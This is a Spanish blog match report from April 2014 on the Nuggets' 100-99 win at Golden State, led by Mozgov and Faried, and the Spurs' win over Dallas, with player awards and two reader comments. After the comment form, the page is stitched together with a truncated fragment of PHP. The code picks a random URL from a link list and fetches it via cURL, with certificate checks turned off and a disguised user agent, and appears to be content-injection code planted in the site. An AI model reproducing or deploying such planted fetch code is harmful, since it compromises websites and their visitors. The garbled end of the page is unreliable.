La Crónica: Mozgov ascending

11 de April de 2014 por txusma

A falta de 4 segundos para acabar el partido los aficionados que abarrotaban el Oracle Arena ya se veían en los playoffs. De hecho, seguro que ya se veían a mediados del segundo cuarto cuando la diferencia de su equipo sobre unos Nuggets plagados de bajas alcanzaba los 20 puntos. Sin embargo en la segunda parte el panorama cambió y los de Denver liderados por Kenneth Faried y un Timofey Mozgov que jugó el partido de su vida, le dieron la vuelta al marcador y llegaron a acumular 5 puntos de ventaja en el último cuarto. Los Warriors no abandonaron y el partido llegó igualadísimo a los instantes finales en los que Stephen Curry anotó la bandeja que parecía dar la victoria a los suyos a falta de 4 segundos. Con el Oracle Arena celebrando prácticamente el triunfo, Kenneth Faried se hizo cargo de la última posesión y de manera poco ortodoxa pero efectiva conectó un semi gancho sobre Daymond Green que hizo silenciar todo el pabellón (100-99).

Con la inesperada derrota, los Warriors no pudieron confirmar su presencia en la postemporada pero tuvieron suerte porque los Dallas Mavericks cayeron en casa ante el rodillo que son ahora mismo los San Antonio Spurs. Ya avisábamos que los de Popovich serían jueces en la lucha que mantienen Mavs, Suns y Grizzlies (y de momento Warriors) por entrar en la post-temporada y de momento ya se la han jugado a Dirk Nowitzki y compañía. Y eso que durante el primer cuarto Tim Duncan nos dio el susto del día al caer en la lucha por un rebote y llevarse la mano a su rodilla derecha. Por suerte no fue nada y pudo reintegrarse al partido sin mayores problemas. A los Mavs les costó entrar en el partido y aunque consiguieron remontar los 11 puntos de desventaja que llegaron a acumular durante el primer cuarto, el esfuerzo les pasó factura durante la 2ª parte en que la fueron arrollados sin contemplaciones. Entre Patty Mills y Danny Green anotaron 11 de 18 triples y Kawhi Leonard y Tim Duncan fueron superiores en todo momento a los jugadores de los Mavs (109-100). 

PREMIOS

MVP: 23 puntos, 29 rebotes, 3 asistencias, 1 robo, 3 tapones… Números de ensueño para un Timofey Mozgov que estuvo en todas partes. Se impuso él solo a todo el juego interior de los Warriors.

Sorpresa: Aparte del partidazo de Mozgov también podríamos destacar los 26 puntos y 6 asistencias de Patty Mills que cumple sobradamente cuando le toca sustituir a Tony Parker.

Decepción: Steve Blake suma más que resta en los Warriors. Se quedó otra vez sin anotar y perdió 2 balones.

Esfuerzo en vano: Cara de tonto se te debe quedar cuando consigues 24 puntos, 7 rebotes, 6 asistencias, 4 robos y la canasta que parece dar la victoria definitiva a tu equipo y acabas perdiendo. Eso fue lo que le pasó a Stephen Curry.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Nacho dice:
    #1

    Lo de los Spurs es de traca. Qué ganitas tengo de que se lleven el anillo!!! Y esta noche reciben a los Suns. Claro que con estos ‘colgaos’ cualquier cosa puede pasar y que pasen, ¡qué gozada!
    Esta noche es de las importantes de verdad. Veremos a los equipos sin disfraz y lo que cada uno quiere. El Este puede dar una vuelta total. Indiana-Miami, veremos si los Knicks confían en ellos y en lo imposible y pueden desbancar a los Raptors de la tercera plaza, Bobcats y Wizards midiéndose en la lejanía, Atlanta intentando finiquitar su pase…
    Noche de las buenas

      Citar

  2. futurman dice:
    #2

    Ehhhh, dirás los Bulls…. Los knicks bastante tienen luchando por la octaba 😀

    A mi quien me gustan son los Bobcats, les veo potencial por primera vez en años.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>